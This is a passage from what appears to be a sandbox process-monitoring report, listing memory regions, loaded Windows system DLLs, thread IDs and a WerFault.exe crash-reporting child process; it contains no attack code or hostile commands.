= 0x71770000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1231 start_va = 0x71760000 end_va = 0x71767fff entry_point = 0x71760000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1232 start_va = 0x4380000 end_va = 0x438ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004380000" filename = "" Region: id = 1233 start_va = 0x4390000 end_va = 0x4393fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 1234 start_va = 0x4480000 end_va = 0x453dfff entry_point = 0x4480000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1235 start_va = 0x4540000 end_va = 0x457ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 1236 start_va = 0x45b0000 end_va = 0x45effff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 1237 start_va = 0x4620000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 1238 start_va = 0x4720000 end_va = 0x475ffff entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 1239 start_va = 0x4760000 end_va = 0x479ffff entry_point = 0x0 region_type = private name = "private_0x0000000004760000" filename = "" Region: id = 1240 start_va = 0x4860000 end_va = 0x486ffff entry_point = 0x0 region_type = private name = "private_0x0000000004860000" filename = "" Region: id = 1241 start_va = 0x73750000 end_va = 0x737a2fff entry_point = 0x73750000 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\SysWOW64\\Faultrep.dll" (normalized: "c:\\windows\\syswow64\\faultrep.dll") Region: id = 1242 start_va = 0x737b0000 end_va = 0x738eefff entry_point = 0x737b0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1243 start_va = 0x738f0000 end_va = 0x73974fff entry_point = 0x738f0000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\SysWOW64\\wer.dll" (normalized: "c:\\windows\\syswow64\\wer.dll") Region: id = 1244 start_va = 0x739b0000 end_va = 0x739d0fff entry_point = 0x739b0000 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\SysWOW64\\dbgcore.dll" (normalized: "c:\\windows\\syswow64\\dbgcore.dll") Region: id = 1245 start_va = 0x739e0000 end_va = 0x73a00fff entry_point = 0x739e0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1246 start_va = 0x73d90000 end_va = 0x73daafff entry_point = 0x73d90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1247 start_va = 0x74030000 end_va = 0x74088fff entry_point = 0x74030000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1248 start_va = 0x74090000 end_va = 0x74099fff entry_point = 0x74090000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1249 start_va = 0x740a0000 end_va = 0x740bdfff entry_point = 0x740a0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1250 start_va = 0x74230000 end_va = 0x743e9fff entry_point = 0x74230000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1251 start_va = 0x74580000 end_va = 0x745c2fff entry_point = 0x74580000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1252 start_va = 0x75b90000 end_va = 0x75c1cfff entry_point = 0x75b90000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1253 start_va = 0x75e40000 end_va = 0x75efdfff entry_point = 0x75e40000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1254 start_va = 0x76040000 end_va = 0x760bafff entry_point = 0x76040000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1255 start_va = 0x762d0000 end_va = 0x7637bfff entry_point = 0x762d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1256 start_va = 0x76410000 end_va = 0x76445fff entry_point = 0x76410000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1257 start_va = 0x76510000 end_va = 0x76685fff entry_point = 0x76510000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1258 start_va = 0x76870000 end_va = 0x7695ffff entry_point = 0x76870000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1259 start_va = 0x7e630000 end_va = 0x7e72ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e630000" filename = "" Region: id = 1260 start_va = 0x7e753000 end_va = 0x7e755fff entry_point = 0x0 region_type = private name = "private_0x000000007e753000" filename = "" Region: id = 1261 start_va = 0x7e756000 end_va = 0x7e758fff entry_point = 0x0 region_type = private name = "private_0x000000007e756000" filename = "" Region: id = 1262 start_va = 0x43a0000 end_va = 0x43a3fff entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 1263 start_va = 0x4580000 end_va = 0x4583fff entry_point = 0x4580000 region_type = mapped_file name = "werfault.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\WerFault.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\werfault.exe.mui") Region: id = 1264 start_va = 0x4590000 end_va = 0x4590fff entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 1265 start_va = 0x45f0000 end_va = 0x45f0fff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 1266 start_va = 0x4850000 end_va = 0x485ffff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1267 start_va = 0x4870000 end_va = 0x49f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Region: id = 1268 start_va = 0x4a00000 end_va = 0x4b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 1269 start_va = 0x4b90000 end_va = 0x5f8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b90000" filename = "" Region: id = 1270 start_va = 0x60d0000 end_va = 0x60dffff entry_point = 0x0 region_type = private name = "private_0x00000000060d0000" filename = "" Region: id = 1271 start_va = 0x73d10000 end_va = 0x73d84fff entry_point = 0x73d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1272 start_va = 0x740e0000 end_va = 0x7422cfff entry_point = 0x740e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1273 start_va = 0x745d0000 end_va = 0x746effff entry_point = 0x745d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1274 start_va = 0x74740000 end_va = 0x7476afff entry_point = 0x74740000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1275 start_va = 0x76e40000 end_va = 0x76f7ffff entry_point = 0x76e40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1276 start_va = 0x4600000 end_va = 0x4600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004600000" filename = "" Region: id = 1277 start_va = 0x4610000 end_va = 0x4610fff entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 1278 start_va = 0x47a0000 end_va = 0x47a1fff entry_point = 0x47a0000 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 1279 start_va = 0x5f90000 end_va = 0x600ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f90000" filename = "" Region: id = 1280 start_va = 0x60e0000 end_va = 0x6416fff entry_point = 0x60e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1281 start_va = 0x732c0000 end_va = 0x73327fff entry_point = 0x732c0000 region_type = mapped_file name = "dbgmodel.dll" filename = "\\Windows\\SysWOW64\\DbgModel.dll" (normalized: "c:\\windows\\syswow64\\dbgmodel.dll") Region: id = 1282 start_va = 0x73330000 end_va = 0x7335cfff entry_point = 0x73330000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1283 start_va = 0x73360000 end_va = 0x7374afff entry_point = 0x73360000 region_type = mapped_file name = "dbgeng.dll" filename = "\\Windows\\SysWOW64\\dbgeng.dll" (normalized: "c:\\windows\\syswow64\\dbgeng.dll") Region: id = 1284 start_va = 0x760c0000 end_va = 0x760cbfff entry_point = 0x760c0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1285 start_va = 0x761e0000 end_va = 0x76271fff entry_point = 0x761e0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1286 start_va = 0x739a0000 end_va = 0x739a9fff entry_point = 0x739a0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 1287 start_va = 0x6420000 end_va = 0x651ffff entry_point = 0x0 region_type = private name = "private_0x0000000006420000" filename = "" Region: id = 1288 start_va = 0x73f80000 end_va = 0x73f87fff entry_point = 0x73f80000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1289 start_va = 0x75f00000 end_va = 0x75fe9fff entry_point = 0x75f00000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1290 start_va = 0x75ff0000 end_va = 0x76033fff entry_point = 0x75ff0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1291 start_va = 0x47b0000 end_va = 0x47b0fff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 1292 start_va = 0x47c0000 end_va = 0x47c2fff entry_point = 0x47c0000 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 1293 start_va = 0x47d0000 end_va = 0x47d3fff entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 1294 start_va = 0x47e0000 end_va = 0x47e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047e0000" filename = "" Region: id = 1295 start_va = 0x47f0000 end_va = 0x47f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047f0000" filename = "" Region: id = 1296 start_va = 0x4800000 end_va = 0x4804fff entry_point = 0x4800000 region_type = mapped_file name = "werui.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\werui.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\werui.dll.mui") Region: id = 1297 start_va = 0x4810000 end_va = 0x4811fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004810000" filename = "" Region: id = 1298 start_va = 0x4820000 end_va = 0x4820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 1299 start_va = 0x4830000 end_va = 0x4831fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004830000" filename = "" Region: id = 1300 start_va = 0x6010000 end_va = 0x604ffff entry_point = 0x0 region_type = private name = "private_0x0000000006010000" filename = "" Region: id = 1301 start_va = 0x6050000 end_va = 0x608ffff entry_point = 0x0 region_type = private name = "private_0x0000000006050000" filename = "" Region: id = 1302 start_va = 0x6090000 end_va = 0x60cffff entry_point = 0x0 region_type = private name = "private_0x0000000006090000" filename = "" Region: id = 1303 start_va = 0x6520000 end_va = 0x661ffff entry_point = 0x0 region_type = private name = "private_0x0000000006520000" filename = "" Region: id = 1304 start_va = 0x6620000 end_va = 0x671ffff entry_point = 0x0 region_type = private name = "private_0x0000000006620000" filename = "" Region: id = 1305 start_va = 0x6720000 end_va = 0x67fefff entry_point = 0x6720000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1306 start_va = 0x6800000 end_va = 0x68fffff entry_point = 0x0 region_type = private name = "private_0x0000000006800000" filename = "" Region: id = 1307 start_va = 0x6900000 end_va = 0x693ffff entry_point = 0x0 region_type = private name = "private_0x0000000006900000" filename = "" Region: id = 1308 start_va = 0x6940000 end_va = 0x697ffff entry_point = 0x0 region_type = private name = "private_0x0000000006940000" filename = "" Region: id = 1309 start_va = 0x6980000 end_va = 0x69bffff entry_point = 0x0 region_type = private name = "private_0x0000000006980000" filename = "" Region: id = 1310 start_va = 0x69c0000 end_va = 0x69fffff entry_point = 0x0 region_type = private name = "private_0x00000000069c0000" filename = "" Region: id = 1311 start_va = 0x6a00000 end_va = 0x6a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 1312 start_va = 0x6a40000 end_va = 0x6a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a40000" filename = "" Region: id = 1313 start_va = 0x6a80000 end_va = 0x6abffff entry_point = 0x0 region_type = private name = "private_0x0000000006a80000" filename = "" Region: id = 1314 start_va = 0x73410000 end_va = 0x7343cfff entry_point = 0x73410000 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 1315 start_va = 0x73440000 end_va = 0x73455fff entry_point = 0x73440000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1316 start_va = 0x73460000 end_va = 0x734e0fff entry_point = 0x73460000 region_type = mapped_file name = "riched20.dll" filename = "\\Windows\\SysWOW64\\riched20.dll" (normalized: "c:\\windows\\syswow64\\riched20.dll") Region: id = 1317 start_va = 0x734f0000 end_va = 0x73569fff entry_point = 0x734f0000 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 1318 start_va = 0x73570000 end_va = 0x736d6fff entry_point = 0x73570000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 1319 start_va = 0x736e0000 end_va = 0x73743fff entry_point = 0x736e0000 region_type = mapped_file name = "werui.dll" filename = "\\Windows\\SysWOW64\\werui.dll" (normalized: "c:\\windows\\syswow64\\werui.dll") Region: id = 1320 start_va = 0x73a10000 end_va = 0x73a37fff entry_point = 0x73a10000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 1321 start_va = 0x73a60000 end_va = 0x73a8efff entry_point = 0x73a60000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1322 start_va = 0x73a90000 end_va = 0x73aa2fff entry_point = 0x73a90000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1323 start_va = 0x73b00000 end_va = 0x73d08fff entry_point = 0x73b00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 1324 start_va = 0x746f0000 end_va = 0x74733fff entry_point = 0x746f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1325 start_va = 0x747d0000 end_va = 0x75b8efff entry_point = 0x747d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1326 start_va = 0x76380000 end_va = 0x76401fff entry_point = 0x76380000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1327 start_va = 0x76690000 end_va = 0x7669efff entry_point = 0x76690000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1328 start_va = 0x76960000 end_va = 0x76e3cfff entry_point = 0x76960000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1329 start_va = 0x7e621000 end_va = 0x7e623fff entry_point = 0x0 region_type = private name = "private_0x000000007e621000" filename = "" Region: id = 1330 start_va = 0x7e624000 end_va = 0x7e626fff entry_point = 0x0 region_type = private name = "private_0x000000007e624000" filename = "" Region: id = 1331 start_va = 0x7e627000 end_va = 0x7e629fff entry_point = 0x0 region_type = private name = "private_0x000000007e627000" filename = "" Region: id = 1332 start_va = 0x7e62a000 end_va = 0x7e62cfff entry_point = 0x0 region_type = private name = "private_0x000000007e62a000" filename = "" Region: id = 1333 start_va = 0x7e62d000 end_va = 0x7e62ffff entry_point = 0x0 region_type = private name = "private_0x000000007e62d000" filename = "" Region: id = 1334 start_va = 0x4840000 end_va = 0x4843fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004840000" filename = "" Region: id = 1335 start_va = 0x6ac0000 end_va = 0x6b77fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006ac0000" filename = "" Region: id = 1336 start_va = 0x6b80000 end_va = 0x6b84fff entry_point = 0x6b80000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 1337 start_va = 0x6b90000 end_va = 0x6b93fff entry_point = 0x0 region_type = private name = "private_0x0000000006b90000" filename = "" Region: id = 1338 start_va = 0x733e0000 end_va = 0x7340cfff entry_point = 0x733e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 1339 start_va = 0x73980000 end_va = 0x7399cfff entry_point = 0x73980000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1340 start_va = 0x6ba0000 end_va = 0x6ba0fff entry_point = 0x6ba0000 region_type = mapped_file name = "duser.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\duser.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\duser.dll.mui") Region: id = 1341 start_va = 0x733d0000 end_va = 0x733dcfff entry_point = 0x733d0000 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\SysWOW64\\atlthunk.dll" (normalized: "c:\\windows\\syswow64\\atlthunk.dll") Thread: id = 45 os_tid = 0xa98 Thread: id = 46 os_tid = 0xa38 Thread: id = 47 os_tid = 0xbfc Thread: id = 49 os_tid = 0xaf0 Thread: id = 50 os_tid = 0xb2c Thread: id = 51 os_tid = 0x7a0 Thread: id = 52 os_tid = 0x7a8 Thread: id = 53 os_tid = 0x7a4 Thread: id = 54 os_tid = 0x7b0 Process: id = "13" image_name = "werfault.exe" filename = "c:\\windows\\syswow64\\werfault.exe" page_root = "0x7b3ac000" os_pid = "0x9d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x784" cmd_line = "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 1924 -s 592" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001c04d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1342 start_va = 0x140000 end_va = 0x182fff entry_point = 0x140000 region_type = mapped_file name = "werfault.exe" filename = "\\Windows\\SysWOW64\\WerFault.exe" (normalized: "c:\\windows\\syswow64\\werfault.exe") Region: id = 1343 start_va = 0x4e0000 end_va = 0x44dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 1344 start_va = 0x44e0000 end_va = 0x44fffff entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 1345 start_va = 0x4500000 end_va = 0x4500fff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1346 start_va = 0x4510000 end_va = 0x4523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 1347 start_va = 0x4530000 end_va = 0x456ffff entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 1348 start_va = 0x4570000 end_va = 0x45affff entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 1349 start_va = 0x45b0000 end_va = 0x45b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045b0000" filename = "" Region: id = 1350 start_va = 0x45c0000 end_va = 0x45c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045c0000" filename = "" Region: id = 1351 start_va = 0x45d0000 end_va = 0x45d1fff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 1352 start_va = 0x76f90000 end_va = 0x77108fff entry_point = 0x76f90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1353 start_va = 0x7eca0000 end_va = 0x7ecc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eca0000" filename = "" Region: id = 1354 start_va = 0x7ecc7000 end_va = 0x7ecc7fff entry_point = 0x0 region_type = private name = "private_0x000000007ecc7000" filename = "" Region: id = 1355 start_va = 0x7eccb000 end_va = 0x7eccbfff entry_point = 0x0 region_type = private name = "private_0x000000007eccb000" filename = "" Region: id = 1356 start_va = 0x7eccd000 end_va = 0x7eccffff entry_point = 0x0 region_type = private name = "private_0x000000007eccd000" filename = "" Region: id = 1357 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1358 start_va = 0x7fff0000 end_va = 0x7dfa4d88ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1359 start_va = 0x7dfa4d890000 end_va = 0x7ffa4d88ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfa4d890000" filename = "" Region: id = 1360 start_va = 0x7ffa4d890000 end_va = 0x7ffa4da51fff entry_point = 0x7ffa4d890000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1361 start_va = 0x7ffa4da52000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffa4da52000" filename = "" Region: id = 1362 start_va = 0x4670000 end_va = 0x467ffff entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 1363 start_va = 0x716e0000 end_va = 0x71752fff entry_point = 0x716e0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1364 start_va = 0x71770000 end_va = 0x717befff entry_point = 0x71770000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1365 start_va = 0x71760000 end_va = 0x71767fff entry_point = 0x71760000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1366 start_va = 0x44e0000 end_va = 0x44effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 1367 start_va = 0x44f0000 end_va = 0x44f3fff entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 1368 start_va = 0x4500000 end_va = 0x4503fff entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1369 start_va = 0x45e0000 end_va = 0x461ffff entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 1370 start_va = 0x4620000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 1371 start_va = 0x4660000 end_va = 0x4663fff entry_point = 0x4660000 region_type = mapped_file name = "werfault.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\WerFault.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\werfault.exe.mui") Region: id = 1372 start_va = 0x4680000 end_va = 0x473dfff entry_point = 0x4680000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1373 start_va = 0x4740000 end_va = 0x4740fff entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 1374 start_va = 0x4750000 end_va = 0x484ffff entry_point = 0x0 region_type = private name = "private_0x0000000004750000" filename = "" Region: id = 1375 start_va = 0x4850000 end_va = 0x4850fff entry_point = 0x0 region_type = private name = "private_0x0000000004850000" filename = "" Region: id = 1376 start_va = 0x4860000 end_va = 0x4860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Region: id = 1377 start_va = 0x4870000 end_va = 0x4870fff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 1378 start_va = 0x4880000 end_va = 0x4881fff entry_point = 0x4880000 region_type = mapped_file name = "faultrep.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\faultrep.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\faultrep.dll.mui") Region: id = 1379 start_va = 0x4930000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 1380 start_va = 0x4940000 end_va = 0x494ffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 1381 start_va = 0x4950000 end_va = 0x4ad7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004950000" filename = "" Region: id = 1382 start_va = 0x4ae0000 end_va = 0x4c60fff 